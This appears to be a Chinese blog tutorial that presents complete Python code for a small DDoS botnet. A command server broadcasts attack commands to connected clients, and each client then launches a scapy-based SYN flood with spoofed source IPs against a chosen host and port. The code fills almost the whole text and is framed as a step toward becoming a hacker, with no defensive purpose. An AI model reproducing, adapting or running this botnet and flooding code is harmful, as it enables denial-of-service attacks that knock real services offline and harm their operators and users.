利用Python实现DDOS攻击,向黑客前进!
DDOS攻击的一些基础知识点在这里就不再赘述,由于Server端要控制client,所以这里需要使用argparse,在这里我们先规定好命令格式:#-H XXX.XXX.XXX.XXX -p xxxx -c
-H后面接的是被攻击主机的IP地址。
-p指定被攻击的端口号。
-c控制攻击的开始与结束。
编码实现:
Server端发送命令,绑定所有网络地址和58868端口并开始监听,之后我们新开一个线程来等待客户端的连接,以免阻塞我们输入命令。Python群125240963 每天有学习资料和视频书籍更新
defmain():
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('0.0.0.0',58868))
s.listen(2014)
t = Thread(target = waitConnect,args=(s,))
r.start()
由于我们要给所有的客户端发送命令,所以我们在新开的线程中将连接进来的socket添加到一个list当中。在主函数中我们第一次输入命令之前需要至少有一个客户端连接到服务器,所以这里我们判断了一下socket的长度。
print('Wait at lease a client connection!')
while not len (socketList):
pass
print('It has been a client connection!')
现在循环等待输入命令,输入之后判断命令是否满足命令格式的基本要求,如果满足了,我们就把命令发送给所有客户端。
while True:
print('=' * 50)
print('The command format:"#-H xxx.xxx.xxx.xxx -p xxxx -c "')
#等待输入命令
cmd_str = input('Please input cmd:')
if len(cmd_str):
if cmd_str[0] == '#':
sendCmd(cmd_str)
现在我们程序的大体框架已经有了,现在我们来编写主函数中没有完成的子功能。 首先我们应该实现等待客户端的函数,方便开启新的线程。
在这个函数中,我们只需要循环等待客户端的连接就可以了,新连接的socket要判断一下是否在socketList中已经存储过了,如果没有的话就添加到socketList中。
#等待连接
def waitConnect(s):
while True:
sock,addr = s.accept()
if sock not in socketList:
socketList.append(sock)
我们再来实现发送命令的函数,这个函数我们遍历socketList这个列表,将每个socket都调用一次send将命令发送出去。
#发送命令
def sendCmd(cmd):
print('Send command......')
for sock in socketList:
sock.send(cmd.encode('utf-8'))
至此我们的Server端就完成了。
在文件夹中新建 ddosSrv.py 文件作为Server端,向其中添加如下代码:
import socket
import argparse
from threading import Thread
socketList = []
#命令格式'#-H xxx.xxx.xxx.xxx -p xxxx -c '
#发送命令
def sendCmd(cmd):
print('Send command......')
for sock in socketList:
sock.send(cmd.encode('utf-8'))
#等待连接
def waitConnect(s):
while True:
sock,addr = s.accept()
if sock not in socketList:
socketList.append(sock)
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 58868))
s.listen(1024)
t = Thread(target=waitConnect,args=(s,))
t.start()
print('Wait at least a client connection!')
while not len(socketList):
pass
print('It has been a client connection!')
while True:
print('=' * 50)
print('The command format:"#-H xxx.xxx.xxx.xxx -p xxxx -c "')
#等待输入命令
cmd_str = input('Please input cmd:')
if len(cmd_str):
if cmd_str[0] == '#':
sendCmd(cmd_str)
if __name__ == '__main__':
main()
3.2 Client端
我们将在Client端实现对主机的SYN泛洪攻击,并在脚本启动后主动连接Server端,等待Server端发送命令。
还是先看主函数了解一下整体思路,在主函数中我们先创建ArgumentParser()对象,并将需要解析的命令参数添加好。
def main():
p = argparse.ArgumentParser()
p.add_argument('-H', dest='host', type=str)
p.add_argument('-p', dest='port', type=int)
p.add_argument('-c', dest='cmd', type=str)
现在可以创建socket,连接服务器了。这里为了测试我们连接到本地地址的58868端口吧!之后我们就可以等待服务器发送命令了。
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',58868))
print('To connected server was success!')
print("=" * 40)
cmdHandle(s,p)
except:
print('The network connected failed!')
print('Please restart the script!')
sys.exit(0)
我们将接收命令和处理命令定义在了一个单独的函数中。在这里我们用到了一个全局变量,用于判断是否有进程正在发起SYN泛洪攻击。之后就开始循环接收命令了,接收之后到的数据是byte型,我们需要对其进行解码,解码之后才是字符串。如果接收到的数据长度为0,就跳过后续的内容,重新接收数据。
#处理命令
def cmdHandle(sock,parser):
global curProcess
while True:
#接收命令
data = sock.recv(1024).decode('utf-8')
if len(data) == 0:
print('The data is empty')
continue
`
如果数据的长度不为0,就判断是否具有命令基本格式的特征(#),满足基本条件就需要用我们的ArgumentParser对象来解析命令了。
if data[0] == '#':
try:
#解析命令
options = parser.parse_args(data[1:].split())
m_host = options.host
m_port = options.port
m_cmd = options.cmd
命令参数解析出来后,我们就要判断到底是start命令还是stop命令了,如果是start命令,我们首先判断当前是否有进程在运行,如果有进程判断进程是否存活。如果当前有进程正在发起SYN泛洪攻击,我们就先结束这个进程,并清空屏幕。然后我们就直接启动一个进程,发起SYN泛洪攻击。
#DDoS启动命令
if m_cmd.lower() == 'start':
if curProcess != None and curProcess.is_alive():
#结束进程
curProcess.terminate()
curProcess = None
os.system('clear')
print('The synFlood is start')
p = Process(target=synFlood,args=(m_host,m_port))
p.start()
curProcess = p
如果命令是stop,并且有进程存活,我们就直接结束这个进程,并清空屏幕。否则就什么也不做。
#DDoS停止命令
elif m_cmd.lower() =='stop':
if curProcess.is_alive():
curProcess.terminate()
os.system('clear')
except:
print('Failed to perform the command!')
由于SYN泛洪攻击我们在上一节实验中已经实现,这里就不多介绍了。
在 目录下新建 ddosCli.py 文件作为Client端,向其中添加如下代码:
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys
import socket
import random
import argparse
from multiprocessing import Process
from scapy.all import *
import os
isWorking = False
curProcess = None
#SYN泛洪攻击
def synFlood(tgt,dPort):
print('='*100)
print('The syn flood is running!')
print('='*100)
srcList = ['201.1.1.2','10.1.1.102','69.1.1.2','125.130.5.199']
for sPort in range(1024,65535):
index = random.randrange(4)
ipLayer = IP(src=srcList[index], dst=tgt)
tcpLayer = TCP(sport=sPort, dport=dPort,flags="S")
packet = ipLayer / tcpLayer
send(packet)
#命令格式'#-H xxx.xxx.xxx.xxx -p xxxx -c '
#处理命令
def cmdHandle(sock,parser):
global curProcess
while True:
#接收命令
data = sock.recv(1024).decode('utf-8')
if len(data) == 0:
print('The data is empty')
return
if data[0] == '#':
try:
#解析命令
options = parser.parse_args(data[1:].split())
m_host = options.host
m_port = options.port
m_cmd = options.cmd
#DDoS启动命令
if m_cmd.lower() == 'start':
if curProcess != None and curProcess.is_alive():
curProcess.terminate()
curProcess = None
os.system('clear')
print('The synFlood is start')
p = Process(target=synFlood,args=(m_host,m_port))
p.start()
curProcess = p
#DDoS停止命令
elif m_cmd.lower() =='stop':
if curProcess.is_alive():
curProcess.terminate()
os.system('clear')
except:
print('Failed to perform the command!')
def main():
#添加需要解析的命令
p = argparse.ArgumentParser()
p.add_argument('-H', dest='host', type=str)
p.add_argument('-p', dest='port', type=int)
p.add_argument('-c', dest='cmd', type=str)
print("*" * 40)
try:
#创建socket对象
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#连接到服务器端
s.connect(('127.0.0.1',58868))
print('To connected server was success!')
print("=" * 40)
#处理命令
cmdHandle(s,p)
except:
print('The network connected failed!')
print('Please restart the script!')
sys.exit(0)
if __name__ == '__main__':
main()
可以看到Client端连接成功。这里就不再找站点来测试了。